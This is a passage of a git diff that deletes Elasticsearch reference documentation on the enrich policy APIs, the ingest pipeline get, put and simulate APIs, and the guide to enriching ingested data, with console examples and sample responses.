-`executed_searches_total`:: -(Integer) -Number of search requests -that enrich processors have executed -since node startup. --- - - -[[enrich-stats-api-example]] -==== {api-examples-title} - - -[source,console] ----- -GET /_enrich/_stats ----- -//TEST[s/^/PUT \/_enrich\/policy\/my-policy\/_execute\/n/\ - -The API returns the following response: - -[source,console-result] ----- -{ - "executing_policies": [ - { - "name": "my-policy", - "task": { - "id": 124, - "type": "direct", - "action": "cluster:admin/xpack/enrich/execute", - "start_time_in_millis": 1458585884904, - "running_time_in_nanos": 47402, - "cancellable": false, - "parent_task_id": "oTUltX4IQMOUUVeiohTt8A:123", - "headers": { - "X-Opaque-Id": "123456" - } - } - } - ], - "coordinator_stats": [ - { - "node_id": "1sFM8cmSROZYhPxVsiWew", - "queue_size": 0, - "remote_requests_current": 0, - "remote_requests_total": 0, - "executed_searches_total": 0 - } - ] -} ----- -// TESTRESPONSE[s/"executing_policies": \[[^\]]*\]/"executing_policies": $body.$_path/] -// TESTRESPONSE[s/"node_id": "1sFM8cmSROZYhPxVsiWew"/"node_id" : $body.coordinator_stats.0.node_id/] -// TESTRESPONSE[s/"remote_requests_total": 0/"remote_requests_total" : $body.coordinator_stats.0.remote_requests_total/] -// TESTRESPONSE[s/"executed_searches_total": 0/"executed_searches_total" : $body.coordinator_stats.0.executed_searches_total/] diff --git a/docs/reference/ingest/apis/enrich/execute-enrich-policy.asciidoc b/docs/reference/ingest/apis/enrich/execute-enrich-policy.asciidoc deleted file mode 100644 index 35e9b9e69b5..00000000000 --- a/docs/reference/ingest/apis/enrich/execute-enrich-policy.asciidoc +++ /dev/null @@ -1,111 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[execute-enrich-policy-api]] -=== Execute enrich policy API -++++ -Execute enrich policy -++++ - -Executes an existing <>. - -//// - -[source,console] ----- -PUT /users/_doc/1?refresh -{ - "email": "mardy.brown@asciidocsmith.com", - "first_name": "Mardy", - "last_name": "Brown", - "city": "New Orleans", - "county": "Orleans", - "state": "LA", - "zip": 70116, - "web": "mardy.asciidocsmith.com" -} - -PUT /_enrich/policy/my-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} ----- -// TESTSETUP -//// - -[source,console] --------------------------------------------------- -PUT /_enrich/policy/my-policy/_execute --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -DELETE /_enrich/policy/my-policy --------------------------------------------------- -// TEST[continued] -//// - - -[[execute-enrich-policy-api-request]] -==== {api-request-title} - -`PUT /_enrich/policy//_execute` - -`POST /_enrich/policy//_execute` - - -[[execute-enrich-policy-api-prereqs]] -==== {api-prereq-title} - -include::put-enrich-policy.asciidoc[tag=enrich-policy-api-prereqs] - - -[[execute-enrich-policy-api-desc]] -==== {api-description-title} - -Use the execute enrich policy API -to create the enrich index for an existing enrich policy. - -// tag::execute-enrich-policy-def[] -The _enrich index_ contains documents from the policy's source indices. -Enrich indices always begin with `.enrich-*`, -are read-only, -and are <>. - -[WARNING] -==== -Enrich indices should be used by the <> only. -Avoid using enrich indices for other purposes. -==== -// end::execute-enrich-policy-def[] - -// tag::update-enrich-index[] -Once created, you cannot update -or index documents to an enrich index. -Instead, update your source indices -and <> the enrich policy again. -This creates a new enrich index from your updated source indices -and deletes the previous enrich index. -// end::update-enrich-index[] - -Because this API request performs several operations, -it may take a while to return a response. - -[[execute-enrich-policy-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Enrich policy to execute. - -[[execute-enrich-policy-api-request-body]] -==== {api-request-body-title} - -`wait_for_completion`:: -(Required, Boolean) -If `true`, the request blocks other enrich policy execution requests until -complete. Defaults to `true`. diff --git a/docs/reference/ingest/apis/enrich/get-enrich-policy.asciidoc b/docs/reference/ingest/apis/enrich/get-enrich-policy.asciidoc deleted file mode 100644 index 7d32d889629..00000000000 --- a/docs/reference/ingest/apis/enrich/get-enrich-policy.asciidoc +++ /dev/null @@ -1,232 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-enrich-policy-api]] -=== Get enrich policy API -++++ -Get enrich policy -++++ - -Returns information about an <>. - -//// -[source,console] ----- -PUT /users -{ - "mappings" : { - "properties" : { - "email" : { "type" : "keyword" } - } - } -} - -PUT /_enrich/policy/my-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} - -PUT /_enrich/policy/other-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} ----- -//// - -[source,console] --------------------------------------------------- -GET /_enrich/policy/my-policy --------------------------------------------------- -// TEST[continued] - - -[[get-enrich-policy-api-request]] -==== {api-request-title} - -`GET /_enrich/policy/` - -`GET /_enrich/policy` - -`GET /_enrich/policy/policy1,policy2` - - -[[get-enrich-policy-api-prereqs]] -==== {api-prereq-title} - -include::put-enrich-policy.asciidoc[tag=enrich-policy-api-prereqs] - - -[[get-enrich-policy-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Optional, string) -Comma-separated list of enrich policy names -used to limit the request. - -To return information for all enrich policies, -omit this parameter. --- - - -[[get-enrich-policy-api-example]] -==== {api-examples-title} - - -[[get-enrich-policy-api-single-ex]] -===== Get a single policy - -[source,console] --------------------------------------------------- -GET /_enrich/policy/my-policy --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "policies": [ - { - "config": { - "match": { - "name": "my-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - } - ] -} --------------------------------------------------- - - -[[get-enrich-policy-api-commas-ex]] -===== Get multiple policies - -[source,console] --------------------------------------------------- -GET /_enrich/policy/my-policy,other-policy --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,js] --------------------------------------------------- -{ - "policies": [ - { - "config": { - "match": { - "name": "my-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - }, - { - "config": { - "match": { - "name": "other-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE - - -[[get-enrich-policy-api-all-ex]] -===== Get all policies - -[source,console] --------------------------------------------------- -GET /_enrich/policy --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "policies": [ - { - "config": { - "match": { - "name": "my-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - }, - { - "config": { - "match": { - "name": "other-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - } - ] -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -DELETE /_enrich/policy/my-policy -DELETE /_enrich/policy/other-policy --------------------------------------------------- -// TEST[continued] -//// diff --git a/docs/reference/ingest/apis/enrich/index.asciidoc b/docs/reference/ingest/apis/enrich/index.asciidoc deleted file mode 100644 index 6e013a3b4a5..00000000000 --- a/docs/reference/ingest/apis/enrich/index.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[enrich-apis]] -== Enrich APIs - -The following enrich APIs are available for managing <>: - -* <> to create or replace an enrich policy -* <> to delete an enrich policy -* <> to return information about an enrich policy -* <> to execute an enrich policy -* <> to get enrich-related stats - - -include::put-enrich-policy.asciidoc[] - -include::delete-enrich-policy.asciidoc[] - -include::get-enrich-policy.asciidoc[] - -include::execute-enrich-policy.asciidoc[] - -include::enrich-stats.asciidoc[] diff --git a/docs/reference/ingest/apis/enrich/put-enrich-policy.asciidoc b/docs/reference/ingest/apis/enrich/put-enrich-policy.asciidoc deleted file mode 100644 index f001e3f2065..00000000000 --- a/docs/reference/ingest/apis/enrich/put-enrich-policy.asciidoc +++ /dev/null @@ -1,96 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[put-enrich-policy-api]] -=== Put enrich policy API -++++ -Put enrich policy -++++ - -Creates an enrich policy. - -//// -[source,console] ----- -PUT /users -{ - "mappings": { - "properties": { - "email": { "type": "keyword" } - } - } -} ----- -//// - -[source,console] ----- -PUT /_enrich/policy/my-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} ----- -// TEST[continued] - -//// -[source,console] --------------------------------------------------- -DELETE /_enrich/policy/my-policy --------------------------------------------------- -// TEST[continued] -//// - - -[[put-enrich-policy-api-request]] -==== {api-request-title} - -`PUT /_enrich/policy/` - - -[[put-enrich-policy-api-prereqs]] -==== {api-prereq-title} - -// tag::enrich-policy-api-prereqs[] -If you use {es} {security-features}, you must have: - -* `read` index privileges for any indices used -* The `enrich_user` <> -// end::enrich-policy-api-prereqs[] - - -[[put-enrich-policy-api-desc]] -==== {api-description-title} - -Use the put enrich policy API -to create a new <>. - -[WARNING] -==== -include::../../enrich.asciidoc[tag=update-enrich-policy] -==== - - - -[[put-enrich-policy-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=enrich-policy] - - -[[put-enrich-policy-api-request-body]] -==== {api-request-body-title} - -``:: -+ --- -(Required, <> object) -Enrich policy used to match and add the right enrich data to -the right incoming documents. - -See <> for object definition and parameters. --- diff --git a/docs/reference/ingest/apis/get-pipeline.asciidoc b/docs/reference/ingest/apis/get-pipeline.asciidoc deleted file mode 100644 index f5e25cbc3a3..00000000000 --- a/docs/reference/ingest/apis/get-pipeline.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[get-pipeline-api]] -=== Get pipeline API -++++ -Get pipeline -++++ - -Returns information about one or more ingest pipelines. -This API returns a local reference of the pipeline. - -//// -[source,console] ----- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "describe pipeline", - "version" : 123, - "processors" : [ - { - "set" : { - "field": "foo", - "value": "bar" - } - } - ] -} ----- -//// - -[source,console] ----- -GET /_ingest/pipeline/my-pipeline-id ----- -// TEST[continued] - - - -[[get-pipeline-api-request]] -==== {api-request-title} - -`GET /_ingest/pipeline/` - -`GET /_ingest/pipeline` - -[[get-pipeline-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`manage_pipeline`, `manage_ingest_pipelines`, or `manage` -<> to use this API. - -[[get-pipeline-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of pipeline IDs to retrieve. Wildcard (`*`) expressions are -supported. -+ -To get all ingest pipelines, omit this parameter or use `*`. - - -[[get-pipeline-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-pipeline-api-api-example]] -==== {api-examples-title} - - -[[get-pipeline-api-specific-ex]] -===== Get information for a specific ingest pipeline - -[source,console] ----- -GET /_ingest/pipeline/my-pipeline-id ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "my-pipeline-id" : { - "description" : "describe pipeline", - "version" : 123, - "processors" : [ - { - "set" : { - "field" : "foo", - "value" : "bar" - } - } - ] - } -} ----- - - -[[get-pipeline-api-version-ex]] -===== Get the version of an ingest pipeline - -When you create or update an ingest pipeline, -you can specify an optional `version` parameter. -The version is useful for managing changes to pipeline -and viewing the current pipeline for an ingest node. - - -To check the pipeline version, -use the `filter_path` query parameter -to <> -to only the version. - -[source,console] ----- -GET /_ingest/pipeline/my-pipeline-id?filter_path=*.version ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "my-pipeline-id" : { - "version" : 123 - } -} ----- - -//// -[source,console] ----- -DELETE /_ingest/pipeline/my-pipeline-id ----- -// TEST[continued] - -[source,console-result] ----- -{ -"acknowledged": true -} ----- -//// diff --git a/docs/reference/ingest/apis/index.asciidoc b/docs/reference/ingest/apis/index.asciidoc deleted file mode 100644 index c1ad765fcc6..00000000000 --- a/docs/reference/ingest/apis/index.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[ingest-apis]] -== Ingest APIs - -The following ingest APIs are available for managing pipelines: - -* <> to add or update a pipeline -* <> to return a specific pipeline -* <> to delete a pipeline -* <> to simulate a call to a pipeline - - -include::put-pipeline.asciidoc[] -include::get-pipeline.asciidoc[] -include::delete-pipeline.asciidoc[] -include::simulate-pipeline.asciidoc[] diff --git a/docs/reference/ingest/apis/put-pipeline.asciidoc b/docs/reference/ingest/apis/put-pipeline.asciidoc deleted file mode 100644 index 32b5dbbc384..00000000000 --- a/docs/reference/ingest/apis/put-pipeline.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ -[[put-pipeline-api]] -=== Put pipeline API -++++ -Put pipeline -++++ - -Creates or updates an ingest pipeline. -Changes made using this API take effect immediately. - -[source,console] ----- -PUT _ingest/pipeline/my-pipeline-id -{ - "description" : "describe pipeline", - "processors" : [ - { - "set" : { - "field": "foo", - "value": "bar" - } - } - ] -} ----- - - -[[put-pipeline-api-request]] -==== {api-request-title} - -`PUT /_ingest/pipeline/` - -[[put-pipeline-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`manage_pipeline`, `manage_ingest_pipelines`, or `manage` -<> to use this API. - - -[[put-pipeline-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) ID of the ingest pipeline to create or update. - - -[[put-pipeline-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[put-pipeline-api-response-body]] -==== {api-response-body-title} - -`description`:: -(Required, string) -Description of the ingest pipeline. - -`processors`:: -+ --- -(Required, array of <>) -Array of processors used to pre-process documents -before indexing. - -Processors are executed in the order provided. - -See <> for processor object definitions -and a list of built-in processors. --- - -`version`:: -+ --- -(Optional, integer) -Optional version number used by external systems to manage ingest pipelines. - -Versions are not used or validated by {es}; -they are intended for external management only. --- - - -[[put-pipeline-api-example]] -==== {api-examples-title} - - -[[versioning-pipelines]] -===== Pipeline versioning - -When creating or updating an ingest pipeline, -you can specify an optional `version` parameter. -The version is useful for managing changes to pipeline -and viewing the current pipeline for an ingest node. - -The following request sets a version number of `123` -for `my-pipeline-id`. - -[source,console] --------------------------------------------------- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "describe pipeline", - "version" : 123, - "processors" : [ - { - "set" : { - "field": "foo", - "value": "bar" - } - } - ] -} --------------------------------------------------- - -To unset the version number, -replace the pipeline without specifying a `version` parameter. - -[source,console] --------------------------------------------------- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "describe pipeline", - "processors" : [ - { - "set" : { - "field": "foo", - "value": "bar" - } - } - ] -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -DELETE /_ingest/pipeline/my-pipeline-id --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ -"acknowledged": true -} --------------------------------------------------- -//// diff --git a/docs/reference/ingest/apis/simulate-pipeline.asciidoc b/docs/reference/ingest/apis/simulate-pipeline.asciidoc deleted file mode 100644 index 545eb70063f..00000000000 --- a/docs/reference/ingest/apis/simulate-pipeline.asciidoc +++ /dev/null @@ -1,451 +0,0 @@ - -[[simulate-pipeline-api]] -=== Simulate pipeline API -++++ -Simulate pipeline -++++ - -Executes an ingest pipeline against -a set of provided documents. - -//// -[source,console] ----- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "example pipeline to simulate", - "processors": [ - { - "set" : { - "field" : "field2", - "value" : "_value" - } - } - ] -} ----- -// TESTSETUP -//// - -[source,console] ----- -POST /_ingest/pipeline/my-pipeline-id/_simulate -{ - "docs": [ - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "bar" - } - }, - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "rab" - } - } - ] -} ----- - - -[[simulate-pipeline-api-request]] -==== {api-request-title} - -`POST /_ingest/pipeline//_simulate` - -`GET /_ingest/pipeline//_simulate` - -`POST /_ingest/pipeline/_simulate` - -`GET /_ingest/pipeline/_simulate` - -[[simulate-pipeline-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`manage_pipeline`, `manage_ingest_pipelines`, or `manage` -<> to use this API. - -[[simulate-pipeline-api-desc]] -==== {api-description-title} - -The simulate pipeline API executes a specific pipeline -against a set of documents provided in the body of the request. - -You can either specify an existing pipeline -to execute against the provided documents -or supply a pipeline definition in the body of the request. - - -[[simulate-pipeline-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Pipeline ID used to simulate an ingest. - - -[[simulate-pipeline-api-query-params]] -==== {api-query-parms-title} - -`verbose`:: -(Optional, Boolean) -If `true`, -the response includes output data -for each processor in the executed pipeline. - - -[[simulate-pipeline-api-request-body]] -==== {api-request-body-title} - -`description`:: -(Optional, string) -Description of the ingest pipeline. - -`processors`:: -+ --- -(Optional, array of <>) -Array of processors used to pre-process documents -during ingest. - -Processors are executed in the order provided. - -See <> for processor object definitions -and a list of built-in processors. --- - -`docs`:: -+ --- -(Required, array) -Array of documents -ingested by the pipeline. - -Document object parameters include: - -`_index`:: -(Optional, string) -Name of the index containing the document. - -`_id`:: -(Optional, string) -Unique identifier for the document. -This ID is only unique within the index. - -`_source`:: -(Required, object) -JSON body for the document. --- - - -[[simulate-pipeline-api-example]] -==== {api-examples-title} - - -[[simulate-pipeline-api-path-parm-ex]] -===== Specify a pipeline as a path parameter - -[source,console] ----- -POST /_ingest/pipeline/my-pipeline-id/_simulate -{ - "docs": [ - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "bar" - } - }, - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "rab" - } - } - ] -} ----- - -The API returns the following response: - -[source,console-result] ----- -{ - "docs": [ - { - "doc": { - "_id": "id", - "_index": "index", - "_type": "_doc", - "_source": { - "field2": "_value", - "foo": "bar" - }, - "_ingest": { - "timestamp": "2017-05-04T22:30:03.187Z" - } - } - }, - { - "doc": { - "_id": "id", - "_index": "index", - "_type": "_doc", - "_source": { - "field2": "_value", - "foo": "rab" - }, - "_ingest": { - "timestamp": "2017-05-04T22:30:03.188Z" - } - } - } - ] -} ----- -// TESTRESPONSE[s/"2017-05-04T22:30:03.187Z"/$body.docs.0.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2017-05-04T22:30:03.188Z"/$body.docs.1.doc._ingest.timestamp/] - - -[[simulate-pipeline-api-request-body-ex]] -===== Specify a pipeline in the request body - -[source,console] ----- -POST /_ingest/pipeline/_simulate -{ - "pipeline" : - { - "description": "_description", - "processors": [ - { - "set" : { - "field" : "field2", - "value" : "_value" - } - } - ] - }, - "docs": [ - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "bar" - } - }, - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "rab" - } - } - ] -} ----- - -The API returns the following response: - -[source,console-result] ----- -{ - "docs": [ - { - "doc": { - "_id": "id", - "_index": "index", - "_type": "_doc", - "_source": { - "field2": "_value", - "foo": "bar" - }, - "_ingest": { - "timestamp": "2017-05-04T22:30:03.187Z" - } - } - }, - { - "doc": { - "_id": "id", - "_index": "index", - "_type": "_doc", - "_source": { - "field2": "_value", - "foo": "rab" - }, - "_ingest": { - "timestamp": "2017-05-04T22:30:03.188Z" - } - } - } - ] -} ----- -// TESTRESPONSE[s/"2017-05-04T22:30:03.187Z"/$body.docs.0.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2017-05-04T22:30:03.188Z"/$body.docs.1.doc._ingest.timestamp/] - - -[[ingest-verbose-param]] -===== View verbose results - -You can use the simulate pipeline API -to see how each processor affects the ingest document -as it passes through the pipeline. -To see the intermediate results -of each processor in the simulate request, -you can add the `verbose` parameter to the request. - -[source,console] ----- -POST /_ingest/pipeline/_simulate?verbose=true -{ - "pipeline" : - { - "description": "_description", - "processors": [ - { - "set" : { - "field" : "field2", - "value" : "_value2" - } - }, - { - "set" : { - "field" : "field3", - "value" : "_value3" - } - } - ] - }, - "docs": [ - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "bar" - } - }, - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "rab" - } - } - ] -} ----- - -The API returns the following response: - -[source,console-result] ----- -{ - "docs": [ - { - "processor_results": [ - { - "processor_type": "set", - "status": "success", - "doc": { - "_index": "index", - "_type": "_doc", - "_id": "id", - "_source": { - "field2": "_value2", - "foo": "bar" - }, - "_ingest": { - "pipeline": "_simulate_pipeline", - "timestamp": "2020-07-30T01:21:24.251836Z" - } - } - }, - { - "processor_type": "set", - "status": "success", - "doc": { - "_index": "index", - "_type": "_doc", - "_id": "id", - "_source": { - "field3": "_value3", - "field2": "_value2", - "foo": "bar" - }, - "_ingest": { - "pipeline": "_simulate_pipeline", - "timestamp": "2020-07-30T01:21:24.251836Z" - } - } - } - ] - }, - { - "processor_results": [ - { - "processor_type": "set", - "status": "success", - "doc": { - "_index": "index", - "_type": "_doc", - "_id": "id", - "_source": { - "field2": "_value2", - "foo": "rab" - }, - "_ingest": { - "pipeline": "_simulate_pipeline", - "timestamp": "2020-07-30T01:21:24.251863Z" - } - } - }, - { - "processor_type": "set", - "status": "success", - "doc": { - "_index": "index", - "_type": "_doc", - "_id": "id", - "_source": { - "field3": "_value3", - "field2": "_value2", - "foo": "rab" - }, - "_ingest": { - "pipeline": "_simulate_pipeline", - "timestamp": "2020-07-30T01:21:24.251863Z" - } - } - } - ] - } - ] -} - ----- -// TESTRESPONSE[s/"2020-07-30T01:21:24.251836Z"/$body.docs.0.processor_results.0.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2020-07-30T01:21:24.251836Z"/$body.docs.0.processor_results.1.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2020-07-30T01:21:24.251863Z"/$body.docs.1.processor_results.0.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2020-07-30T01:21:24.251863Z"/$body.docs.1.processor_results.1.doc._ingest.timestamp/] - -//// -[source,console] ----- -DELETE /_ingest/pipeline/* ----- - -[source,console-result] ----- -{ -"acknowledged": true -} ----- -//// diff --git a/docs/reference/ingest/enrich.asciidoc b/docs/reference/ingest/enrich.asciidoc deleted file mode 100644 index 49195ecda7a..00000000000 --- a/docs/reference/ingest/enrich.asciidoc +++ /dev/null @@ -1,624 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ingest-enriching-data]] -== Enrich your data - -You can use the <> to add data from your -existing indices to incoming documents during ingest. - -For example, you can use the enrich processor to: - -* Identify web services or vendors based on known IP addresses -* Add product information to retail orders based on product IDs -* Supplement contact information based on an email address -* Add postal codes based on user coordinates - -[discrete] -[[how-enrich-works]] -=== How the enrich processor works - -An <> changes documents before they are actually -indexed. You can think of an ingest pipeline as an assembly line made up of a -series of workers, called <>. Each processor makes -specific changes, like lowercasing field values, to incoming documents before -moving on to the next. When all the processors in a pipeline are done, the -finished document is added to the target index. - -image::images/ingest/ingest-process.svg[align="center"] - -Most processors are self-contained and only change _existing_ data in incoming -documents. But the enrich processor adds _new_ data to incoming documents -and requires a few special components: - -image::images/ingest/enrich/enrich-process.svg[align="center"] - -[[enrich-policy]] -enrich policy:: -+ --- -A set of configuration options used to add the right enrich data to the right -incoming documents. - -An enrich policy contains: - -// tag::enrich-policy-fields[] -* A list of one or more _source indices_ which store enrich data as documents -* The _policy type_ which determines how the processor matches the enrich data - to incoming documents -* A _match field_ from the source indices used to match incoming documents -* _Enrich fields_ containing enrich data from the source indices you want to add - to incoming documents -// end::enrich-policy-fields[] - -Before it can be used with an enrich processor, an enrich policy must be -<>. When executed, an enrich policy uses -enrich data from the policy's source indices to create a streamlined system -index called the _enrich index_. The processor uses this index to match and -enrich incoming documents. - -See <> for a full list of enrich policy types and -configuration options. --- - -[[source-index]] -source index:: -An index which stores enrich data you'd like to add to incoming documents. You -can create and manage these indices just like a regular {es} index. You can use -multiple source indices in an enrich policy. You also can use the same source -index in multiple enrich policies. - -[[enrich-index]] -enrich index:: -+ --- -A special system index tied to a specific enrich policy. - -Directly matching incoming documents to documents in source indices could be -slow and resource intensive. To speed things up, the enrich processor uses an -enrich index. - -Enrich indices contain enrich data from source indices but have a few special -properties to help streamline them: - -* They are system indices, meaning they're managed internally by {es} and only - intended for use with enrich processors. -* They always begin with `.enrich-*`. -* They are read-only, meaning you can't directly change them. -* They are <> for fast retrieval. --- - -[role="xpack"] -[testenv="basic"] -[[enrich-setup]] -=== Set up an enrich processor - -To set up an enrich processor, follow these steps: - -. Check the <>. -. <>. -. <>. -. <>. -. <>. -. <>. - -Once you have an enrich processor set up, -you can <> -and <>. - -[IMPORTANT] -==== -The enrich processor performs several operations -and may impact the speed of your <>. - -We strongly recommend testing and benchmarking your enrich processors -before deploying them in production. - -We do not recommend using the enrich processor to append real-time data. -The enrich processor works best with reference data -that doesn't change frequently. -==== - -[discrete] -[[enrich-prereqs]] -==== Prerequisites - -include::{es-repo-dir}/ingest/apis/enrich/put-enrich-policy.asciidoc[tag=enrich-policy-api-prereqs] - -[[create-enrich-source-index]] -==== Add enrich data - -To begin, add documents to one or more source indices. These documents should -contain the enrich data you eventually want to add to incoming documents. - -You can manage source indices just like regular {es} indices using the -<> and <> APIs. - -You also can set up {beats-ref}/getting-started.html[{beats}], such as a -{filebeat-ref}/filebeat-installation-configuration.html[{filebeat}], to -automatically send and index documents to your source indices. See -{beats-ref}/getting-started.html[Getting started with {beats}]. - -[[create-enrich-policy]] -==== Create an enrich policy - -After adding enrich data to your source indices, you can -<>. When defining the enrich -policy, you should include at least the following: - -include::enrich.asciidoc[tag=enrich-policy-fields] - -You can use this definition to create the enrich policy with the -<>. - -[WARNING] -==== -Once created, you can't update or change an enrich policy. -See <>. -==== - -[[execute-enrich-policy]] -==== Execute the enrich policy - -Once the enrich policy is created, you can execute it using the -<> to create an -<>. - -image::images/ingest/enrich/enrich-policy-index.svg[align="center"] - -include::apis/enrich/execute-enrich-policy.asciidoc[tag=execute-enrich-policy-def] - -[[add-enrich-processor]] -==== Add an enrich processor to an ingest pipeline - -Once you have source indices, an enrich policy, and the related enrich index in -place, you can set up an ingest pipeline that includes an enrich processor for -your policy. - -image::images/ingest/enrich/enrich-processor.svg[align="center"] - -Define an <> and add it to an ingest -pipeline using the <>. - -When defining the enrich processor, you must include at least the following: - -* The enrich policy to use. -* The field used to match incoming documents to the documents in your enrich index. -* The target field to add to incoming documents. This target field contains the -match and enrich fields specified in your enrich policy. - -You also can use the `max_matches` option to set the number of enrich documents -an incoming document can match. If set to the default of `1`, data is added to -an incoming document's target field as a JSON object. Otherwise, the data is -added as an array. - -See <> for a full list of configuration options. - -You also can add other <> to your ingest pipeline. - -[[ingest-enrich-docs]] -==== Ingest and enrich documents - -You can now use your ingest pipeline to enrich and index documents. - -image::images/ingest/enrich/enrich-process.svg[align="center"] - -Before implementing the pipeline in production, we recommend indexing a few test -documents first and verifying enrich data was added correctly using the -<>. - -[[update-enrich-data]] -==== Update an enrich index - -include::{es-repo-dir}/ingest/apis/enrich/execute-enrich-policy.asciidoc[tag=update-enrich-index] - -If wanted, you can <> -or <> any already ingested documents -using your ingest pipeline. - -[[update-enrich-policies]] -==== Update an enrich policy - -// tag::update-enrich-policy[] -Once created, you can't update or change an enrich policy. -Instead, you can: - -. Create and <> a new enrich policy. - -. Replace the previous enrich policy - with the new enrich policy - in any in-use enrich processors. - -. Use the <> API - to delete the previous enrich policy. -// end::update-enrich-policy[] - -[role="xpack"] -[testenv="basic"] -[[enrich-policy-definition]] -=== Enrich policy definition - -<> are defined as JSON objects like the -following: - -[source,js] ----- -{ - "": { - "indices": [ "..." ], - "match_field": "...", - "enrich_fields": [ "..." ], - "query": {... } - } -} ----- -// NOTCONSOLE - -[[enrich-policy-parms]] -==== Parameters - -``:: -+ --- -(Required, enrich policy object) -The enrich policy type determines how enrich data is matched to incoming -documents. - -Supported enrich policy types include: - -<>::: -Matches enrich data to incoming documents based on a geographic location using -a <>. For an example, see -<>. - -<>::: -Matches enrich data to incoming documents based on a precise value, such as an -email address or ID, using a <>. For an -example, see <>. --- - -`indices`:: -+ --- -(Required, String or array of strings) -Source indices used to create the enrich index. - -If multiple indices are provided, they must share a common `match_field`, which -the enrich processor can use to match incoming documents. --- - -`match_field`:: -(Required, string) -Field in the source indices used to match incoming documents. - -`enrich_fields`:: -(Required, Array of strings) -Fields to add to matching incoming documents. These fields must be present in -the source indices. - -`query`:: -(Optional, <>) -Query used to filter documents in the enrich index for matching. Defaults to -a <> query. - -[role="xpack"] -[testenv="basic"] -[[geo-match-enrich-policy-type]] -=== Example: Enrich your data based on geolocation - -`geo_match` <> match enrich data to incoming -documents based on a geographic location, using a -<>. - -The following example creates a `geo_match` enrich policy that adds postal -codes to incoming documents based on a set of coordinates. It then adds the -`geo_match` enrich policy to a processor in an ingest pipeline. - -Use the <> to create a source index -containing at least one `geo_shape` field. - -[source,console] ----- -PUT /postal_codes -{ - "mappings": { - "properties": { - "location": { - "type": "geo_shape" - }, - "postal_code": { - "type": "keyword" - } - } - } -} ----- - -Use the <> to index enrich data to this source index. - -[source,console] ----- -PUT /postal_codes/_doc/1?refresh=wait_for -{ - "location": { - "type": "envelope", - "coordinates": [ [ 13.0, 53.0 ], [ 14.0, 52.0 ] ] - }, - "postal_code": "96598" -} ----- -// TEST[continued] - -Use the <> to create an enrich -policy with the `geo_match` policy type. This policy must include: - -* One or more source indices -* A `match_field`, - the `geo_shape` field from the source indices used to match incoming documents -* Enrich fields from the source indices you'd like to append to incoming - documents - -[source,console] ----- -PUT /_enrich/policy/postal_policy -{ - "geo_match": { - "indices": "postal_codes", - "match_field": "location", - 